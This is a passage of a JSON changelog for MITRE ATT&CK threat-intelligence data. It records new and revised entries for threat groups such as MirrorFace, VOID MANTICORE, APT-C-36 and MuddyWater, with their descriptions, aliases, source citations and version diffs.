                            "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.",
                            "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "SDBbot"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 15:50:34.668000+00:00\", \"old_value\": \"2025-04-16 20:38:23.446000+00:00\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://web.archive.org/web/20200420201624/https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/\", \"old_value\": \"https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "2.1"
                }
            ],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "groups": {
            "additions": [
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--8cf6e33b-b6ef-4a1f-a77c-0ecdde93161f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-17 12:01:07.688000+00:00",
                    "modified": "2026-04-24 02:22:57.318000+00:00",
                    "name": "MirrorFace",
                    "description": "[MirrorFace](https://attack.mitre.org/groups/G1054) is a People's Republic of China (PRC)-aligned cyberespionage actor believed to be a subgroup under the [menuPass](https://attack.mitre.org/groups/G0045) umbrella based on targeting, tools, and infrastructure overlaps. [MirrorFace](https://attack.mitre.org/groups/G1054) has been active since at least 2019, at first exclusively targeting Japanese organizations across the media, defense, diplomatic, financial, manufacturing, and academic sectors. Subsequent [MirrorFace](https://attack.mitre.org/groups/G1054) operations included targets in Central Europe and featured use of [LODEINFO](https://attack.mitre.org/software/S9020), [HiddenFace](https://attack.mitre.org/software/S9023), and [UPPERCUT](https://attack.mitre.org/software/S0275) malware.(Citation: Kaspersky LODEINFO OCT 2022)(Citation: Kaspersky LODEINFO Part II OCT 2022)(Citation: ESET MirrorFace DEC 2022)(Citation: JPCERT MirrorFace JUL 2024)(Citation: Trend Micro Earth Kasha NOV 2024)(Citation: Trend Micro Earth Kasha Updates APR 2025)",
                    "aliases": [
                        "MirrorFace",
                        "Earth Kasha"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G1054",
                            "external_id": "G1054"
                        },
                        {
                            "source_name": "Earth Kasha",
                            "description": "(Citation: Trend Micro Earth Kasha NOV 2024)(Citation: Trend Micro Earth Kasha Updates APR 2025)"
                        },
                        {
                            "source_name": "ESET MirrorFace DEC 2022",
                            "description": "Breitenbacher, D. (2022, December 14). Unmasking MirrorFace: Operation LiberalFace targeting Japanese political entities. Retrieved April 17, 2026.",
                            "url": "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/"
                        },
                        {
                            "source_name": "Trend Micro Earth Kasha Updates APR 2025",
                            "description": "Hiroaki, H. (2025, April 30). Earth Kasha Updates TTPs in Latest Campaign Targeting Taiwan and Japan. Retrieved April 17, 2026.",
                            "url": "https://www.trendmicro.com/en_us/research/25/d/earth-kasha-updates-ttps.html"
                        },
                        {
                            "source_name": "Kaspersky LODEINFO OCT 2022",
                            "description": "Ishimaru, S. (2022, October 31). APT10: Tracking down LODEINFO 2022, part I. Retrieved April 17, 2026.",
                            "url": "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/"
                        },
                        {
                            "source_name": "Kaspersky LODEINFO Part II OCT 2022",
                            "description": "Ishimaru, S. (2022, October 31). APT10: Tracking down LODEINFO 2022, part II. Retrieved April 17, 2026.",
                            "url": "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/"
                        },
                        {
                            "source_name": "JPCERT MirrorFace JUL 2024",
                            "description": "Tomonaga, S. (2024, July 16). MirrorFace Attack against Japanese Organisations. Retrieved April 17, 2026.",
                            "url": "https://blogs.jpcert.or.jp/en/2024/07/mirrorface-attack-against-japanese-organisations.html"
                        },
                        {
                            "source_name": "Trend Micro Earth Kasha NOV 2024",
                            "description": "Trend Micro. (2024, November 19). Spot the Difference: Earth Kasha's New LODEINFO Campaign And The Correlation Analysis With The APT10 Umbrella. Retrieved April 17, 2026.",
                            "url": "https://www.trendmicro.com/en_us/research/24/k/lodeinfo-campaign-of-earth-kasha.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dominik Breitenbacher, ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--ebd7ce77-c9ba-4fba-bb28-58296ac66559",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 15:16:16.697000+00:00",
                    "modified": "2026-04-23 01:46:56.261000+00:00",
                    "name": "VOID MANTICORE",
                    "description": "[VOID MANTICORE](https://attack.mitre.org/groups/G1055) is a threat group assessed to operate on behalf of Iran\u2019s Ministry of Intelligence and Security (MOIS).(Citation: Check Point VOID MANTICORE Handala Hack March 2026) Active since at least mid-2022, VOID MANTICORE has targeted government entities, critical infrastructure, and private sector organizations across Albania, Israel, and the United States.(Citation: Check Point VOID MANTICORE Handala Hack March 2026)(Citation: Palo Alto VOID MANTICORE Iran Cyber Threats March 2026) [VOID MANTICORE](https://attack.mitre.org/groups/G1055) conducts destructive cyber operations, combining wiper attacks with hack-and-leak campaigns. The group has operated under multiple public-facing personas, including (LinkByld: C0038) in operations against Albania, Karma and Karma Below in campaigns targeting Israeli organizations, and Handala Hack, its current primary persona, which has claimed activity against Israeli and U.S. entities, including a March 2026 attack against Stryker Corporation.(Citation: Check Point VOID MANTICORE Handala Hack March 2026)(Citation: DOJ FBI Handala Hack March 2026)  [VOID MANTICORE](https://attack.mitre.org/groups/G1055) has been observed collaborating with Scarred Manticore, which has been linked to initial access operations preceding VOID MANTICORE\u2019s activity.(Citation: Domain Tools Handala Hack Karma Homeland Justice MOIS April 2026) ",
                    "aliases": [
                        "VOID MANTICORE",
                        "COBALT MYSTIQUE",
                        "Handala Hack",
                        "Homeland Justice",
                        "Karma",
                        "Karmabelow80",
                        "BANISHED KITTEN",
                        "Red Sandstorm"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G1055",
                            "external_id": "G1055"
                        },
                        {
                            "source_name": "BANISHED KITTEN",
                            "description": "(Citation: Check Point VOID MANTICORE Handala Hack March 2026)"
                        },
                        {
                            "source_name": "Red Sandstorm",
                            "description": "(Citation: Check Point VOID MANTICORE Handala Hack March 2026)"
                        },
                        {
                            "source_name": "Handala Hack",
                            "description": "(Citation: DOJ FBI Handala Hack March 2026)"
                        },
                        {
                            "source_name": "Homeland Justice",
                            "description": "(Citation: DOJ FBI Handala Hack March 2026)"
                        },
                        {
                            "source_name": "Karma",
                            "description": "(Citation: DOJ FBI Handala Hack March 2026)"
                        },
                        {
                            "source_name": "COBALT MYSTIQUE",
                            "description": "(Citation: Sophos VOID MANTICORE COBALT MYSTIQUE other Names April 2026)"
                        },
                        {
                            "source_name": "Karmabelow80",
                            "description": "(Citation: Sophos VOID MANTICORE COBALT MYSTIQUE other Names April 2026)"
                        },
                        {
                            "source_name": "Check Point VOID MANTICORE Handala Hack March 2026",
                            "description": "Check Point Research. (2026, March 12). \u201cHandala Hack\u201d \u2013 Unveiling Group\u2019s Modus Operandi. Retrieved April 20, 2026.",
                            "url": "https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/"
                        },
                        {
                            "source_name": "DOJ FBI Handala Hack March 2026",
                            "description": "DOJ/FBI. (2026, March 19). Case 1:26-mj-00683-CDA: Affidavit in Support of Seizure Warrant: In the Matter of the Seizure of Domain Names Justicehomeland[.]org; karmabelow80[.]org; handala-hack[.]to; and handala-redwatned[.]to. Retrieved April 20, 2026.",
                            "url": "https://www.justice.gov/opa/media/1431956/dl?inline"
                        },
                        {
                            "source_name": "Domain Tools Handala Hack Karma Homeland Justice MOIS April 2026",
                            "description": "DomainTools Investigations. (2026, April 6). Handala: MOIS Linked Cyber Influence Ecosystem Threat Intelligence Assessment. Retrieved April 20, 2026.",
                            "url": "https://dti.domaintools.com/research/handala-mois-linked-cyber-influence-ecosystem-threat-intelligence-assessment"
                        },
                        {
                            "source_name": "Palo Alto VOID MANTICORE Iran Cyber Threats March 2026",
                            "description": "Justin Moore. (2026, March 16). Iranian Cyber Threat Evolution: From MBR Wipers to Identity Weaponization. Retrieved April 20, 2026.",
                            "url": "https://unit42.paloaltonetworks.com/evolution-of-iran-cyber-threats/"
                        },
                        {
                            "source_name": "Sophos VOID MANTICORE COBALT MYSTIQUE other Names April 2026",
                            "description": "Sophos. (2026, April 20). Iran COBALT MYSTIQUE. Retrieved April 20, 2026.",
                            "url": "https://www.sophos.com/en-us/threat-profiles/cobalt-mystique"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                }
            ],
            "major_version_changes": [
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-05 18:53:08.166000+00:00",
                    "modified": "2026-04-23 03:37:06.250000+00:00",
                    "name": "APT-C-36",
                    "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South American threat group that has engaged in espionage and financially motivated operations since at least 2018. [APT-C-36](https://attack.mitre.org/groups/G0099) has targeted government institutions and entities in the financial, energy, and professional manufacturing sectors across Colombia and other Latin American countries.(Citation: QiAnXin APT-C-36 Feb2019)(Citation: Kaspersky BlindEagle AUG 2024)(Citation: Check Point Blind Eagle MAR 2025)(Citation: Recorded Future TAG-144 AUG 2025)",
                    "aliases": [
                        "APT-C-36",
                        "Blind Eagle",
                        "TAG-144",
                        "AguilaCiega",
                        "APT-Q-98"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0099",
                            "external_id": "G0099"
                        },
                        {
                            "source_name": "Blind Eagle",
                            "description": "(Citation: QiAnXin APT-C-36 Feb2019)(Citation: Recorded Future TAG-144 AUG 2025)"
                        },
                        {
                            "source_name": "TAG-144",
                            "description": "(Citation: Recorded Future TAG-144 AUG 2025)"
                        },
                        {
                            "source_name": "AguilaCiega",
                            "description": "(Citation: Recorded Future TAG-144 AUG 2025)"
                        },
                        {
                            "source_name": "APT-Q-98",
                            "description": "(Citation: Recorded Future TAG-144 AUG 2025)"
                        },
                        {
                            "source_name": "Check Point Blind Eagle MAR 2025",
                            "description": "Check Point Research. (2025, March 10). Blind Eagle: \u2026And Justice for All. Retrieved April 16, 2026.",
                            "url": "https://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/"
                        },
                        {
                            "source_name": "Kaspersky BlindEagle AUG 2024",
                            "description": "Global Research & Analysis Team, Kaspersky. (2024, August 19). BlindEagle flying high in Latin America. Retrieved April 16, 2026.",
                            "url": "https://securelist.com/blindeagle-apt/113414/"
                        },
                        {
                            "source_name": "Recorded Future TAG-144 AUG 2025",
                            "description": "Insikt Group. (2025, August 26). TAG-144\u2019s Persistent Grip on South American Organizations. Retrieved April 16, 2026.",
                            "url": "https://assets.recordedfuture.com/insikt-report-pdfs/2025/cta-2025-0826.pdf"
                        },
                        {
                            "source_name": "QiAnXin APT-C-36 Feb2019",
                            "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020.",
                            "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jose Luis S\u00e1nchez Martinez"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 03:37:06.250000+00:00\", \"old_value\": \"2025-04-25 14:49:32.503000+00:00\"}, \"root['description']\": {\"new_value\": \"[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South American threat group that has engaged in espionage and financially motivated operations since at least 2018. [APT-C-36](https://attack.mitre.org/groups/G0099) has targeted government institutions and entities in the financial, energy, and professional manufacturing sectors across Colombia and other Latin American countries.(Citation: QiAnXin APT-C-36 Feb2019)(Citation: Kaspersky BlindEagle AUG 2024)(Citation: Check Point Blind Eagle MAR 2025)(Citation: Recorded Future TAG-144 AUG 2025)\", \"old_value\": \"[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.(Citation: QiAnXin APT-C-36 Feb2019)\"}, \"root['external_references'][1]['description']\": {\"new_value\": \"(Citation: QiAnXin APT-C-36 Feb2019)(Citation: Recorded Future TAG-144 AUG 2025)\", \"old_value\": \"(Citation: QiAnXin APT-C-36 Feb2019)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['aliases'][2]\": \"TAG-144\", \"root['aliases'][3]\": \"AguilaCiega\", \"root['aliases'][4]\": \"APT-Q-98\", \"root['external_references'][2]\": {\"source_name\": \"TAG-144\", \"description\": \"(Citation: Recorded Future TAG-144 AUG 2025)\"}, \"root['external_references'][3]\": {\"source_name\": \"AguilaCiega\", \"description\": \"(Citation: Recorded Future TAG-144 AUG 2025)\"}, \"root['external_references'][4]\": {\"source_name\": \"APT-Q-98\", \"description\": \"(Citation: Recorded Future TAG-144 AUG 2025)\"}, \"root['external_references'][5]\": {\"source_name\": \"Check Point Blind Eagle MAR 2025\", \"description\": \"Check Point Research. (2025, March 10). Blind Eagle: \\u2026And Justice for All. Retrieved April 16, 2026.\", \"url\": \"https://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\"}, \"root['external_references'][6]\": {\"source_name\": \"Kaspersky BlindEagle AUG 2024\", \"description\": \"Global Research & Analysis Team, Kaspersky. (2024, August 19). BlindEagle flying high in Latin America. Retrieved April 16, 2026.\", \"url\": \"https://securelist.com/blindeagle-apt/113414/\"}, \"root['external_references'][7]\": {\"source_name\": \"Recorded Future TAG-144 AUG 2025\", \"description\": \"Insikt Group. (2025, August 26). TAG-144\\u2019s Persistent Grip on South American Organizations. Retrieved April 16, 2026.\", \"url\": \"https://assets.recordedfuture.com/insikt-report-pdfs/2025/cta-2025-0826.pdf\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to46__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to46__0\"><a href=\"#difflib_chg_to46__top\">t</a></td><td class=\"diff_header\" id=\"from46_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">[APT-C-36](https://attack.mitre.org/groups/G0099)&nbsp;is&nbsp;a&nbsp;suspe</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to46__top\">t</a></td><td class=\"diff_header\" id=\"to46_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">[APT-C-36](https://attack.mitre.org/groups/G0099)&nbsp;is&nbsp;a&nbsp;suspe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">cted&nbsp;South&nbsp;America&nbsp;espionage&nbsp;group&nbsp;that&nbsp;has&nbsp;been&nbsp;active&nbsp;sinc</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cted&nbsp;South&nbsp;American&nbsp;threat&nbsp;group&nbsp;that&nbsp;has&nbsp;engaged&nbsp;in&nbsp;espiona</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;at&nbsp;least&nbsp;2018.&nbsp;The&nbsp;group&nbsp;mainly&nbsp;targets&nbsp;Colombian&nbsp;governme</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ge&nbsp;and&nbsp;financially&nbsp;motivated&nbsp;operations&nbsp;since&nbsp;at&nbsp;least&nbsp;2018.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nt&nbsp;institutions&nbsp;as&nbsp;well&nbsp;as&nbsp;important&nbsp;corporations&nbsp;in&nbsp;the&nbsp;fin</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;[APT-C-36](https://attack.mitre.org/groups/G0099)&nbsp;has&nbsp;targe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ancial&nbsp;sector,&nbsp;petroleum&nbsp;industry,&nbsp;and&nbsp;professional&nbsp;manufact</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ted&nbsp;government&nbsp;institutions&nbsp;and&nbsp;entities&nbsp;in&nbsp;the&nbsp;financial,&nbsp;e</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">uring.(Citation:&nbsp;QiAnXin&nbsp;APT-C-36&nbsp;Feb2019)</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nergy,&nbsp;and&nbsp;professional&nbsp;manufacturing&nbsp;sectors&nbsp;across&nbsp;Colombi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">a&nbsp;and&nbsp;other&nbsp;Latin&nbsp;American&nbsp;countries.(Citation:&nbsp;QiAnXin&nbsp;APT-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">C-36&nbsp;Feb2019)(Citation:&nbsp;Kaspersky&nbsp;BlindEagle&nbsp;AUG&nbsp;2024)(Citat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion:&nbsp;Check&nbsp;Point&nbsp;Blind&nbsp;Eagle&nbsp;MAR&nbsp;2025)(Citation:&nbsp;Recorded&nbsp;Fu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ture&nbsp;TAG-144&nbsp;AUG&nbsp;2025)</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-04-18 17:59:24.739000+00:00",
                    "modified": "2026-04-23 03:26:57.416000+00:00",
                    "name": "MuddyWater",
                    "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. [MuddyWater](https://attack.mitre.org/groups/G0069) has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, [MuddyWater](https://attack.mitre.org/groups/G0069) used commercial satellite internet (i.e., Starlink) for command and control (C2) communication. (Citation: FalconFeeds_Iran_Mar2026)(Citation: Huntio_IranInfra_Mar2026)(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)(Citation: NaumaanProofpoint_GlobalClickFix_April2025)(Citation: ESET_MuddyWater_Dec2025)(Citation: SymantecCarbonBlack_Seedworm_Mar2026)   ",
                    "aliases": [
                        "MuddyWater",
                        "Earth Vetala",
                        "MERCURY",
                        "Static Kitten",
                        "Seedworm",
                        "TEMP.Zagros",
                        "Mango Sandstorm",
                        "TA450",
                        "MuddyKrill"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0069",
                            "external_id": "G0069"
                        },
                        {
                            "source_name": "Cloudflare 2026 Threat Report New Threat Actors March 2026",
                            "description": " Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.",
                            "url": "https://blog.cloudflare.com/2026-threat-report/"
                        },
                        {
                            "source_name": "MERCURY",
                            "description": "(Citation: Anomali Static Kitten February 2021)"
                        },
                        {
                            "source_name": "Static Kitten",
                            "description": "(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)"
                        },
                        {
                            "source_name": "MuddyKrill",
                            "description": "(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)"
                        },
                        {
                            "source_name": "TEMP.Zagros",
                            "description": "(Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)"
                        },
                        {
                            "source_name": "Mango Sandstorm",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "TA450",
                            "description": "(Citation: Proofpoint TA450 Phishing March 2024)"
                        },
                        {
                            "source_name": "Seedworm",
                            "description": "(Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)"
                        },
                        {
                            "source_name": "Earth Vetala",
                            "description": "(Citation: Trend Micro Muddy Water March 2021)"
                        },
                        {
                            "source_name": "MuddyWater",
                            "description": "(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)"
                        },
                        {
                            "source_name": "ClearSky MuddyWater Nov 2018",
                            "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
                            "url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf"
                        },
                        {
                            "source_name": "ClearSky MuddyWater June 2019",
                            "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020.",
                            "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf"
                        },
                        {
                            "source_name": "CYBERCOM Iranian Intel Cyber January 2022",
                            "description": "Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.",
                            "url": "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/"
                        },
                        {
                            "source_name": "ESET_MuddyWater_Dec2025",
                            "description": "ESET Research. (2025, December 2). MuddyWater: Snakes by the riverbank. Retrieved February 17, 2026.",
                            "url": "https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/"
                        },
                        {
                            "source_name": "FalconFeeds_Iran_Mar2026",
                            "description": "FalconFeeds.io. (2026, March 5). The Digital Redoubt: Iran\u2019s National Information Network and the Asymmetry of Modern Cyber Conflict. Retrieved March 9, 2026.",
                            "url": "https://falconfeeds.io/blogs/the-digital-redoubt-irans-national-information-network-cyber-conflict"
                        },
                        {
                            "source_name": "DHS CISA AA22-055A MuddyWater February 2022",
                            "description": "FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.",
                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a"
                        },
                        {
                            "source_name": "Huntio_IranInfra_Mar2026",
                            "description": "Hunt.io. (2026, March 4). Iranian APT Infrastructure in Focus:  Mapping State-Aligned Clusters During Geopolitical Escalation. Retrieved April 16, 2026.",
                            "url": "https://hunt.io/blog/iranian-apt-infrastructure-state-aligned-clusters"
                        },
                        {
                            "source_name": "Unit 42 MuddyWater Nov 2017",
                            "description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
                            "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
                        },
                        {
                            "source_name": "Talos MuddyWater Jan 2022",
                            "description": "Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.",
                            "url": "https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html"
                        },
                        {
                            "source_name": "Anomali Static Kitten February 2021",
                            "description": "Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.",
                            "url": "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "Proofpoint TA450 Phishing March 2024",
                            "description": "Miller, J. et al. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. Retrieved March 27, 2024.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign"
                        },
                        {
                            "source_name": "NaumaanProofpoint_GlobalClickFix_April2025",
                            "description": "Naumaan, S., et al. (2025, April 17). Around the World in 90 Days: State-Sponsored Actors Try ClickFix . Retrieved January 21, 2026.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix"
                        },
                        {
                            "source_name": "Trend Micro Muddy Water March 2021",
                            "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.",
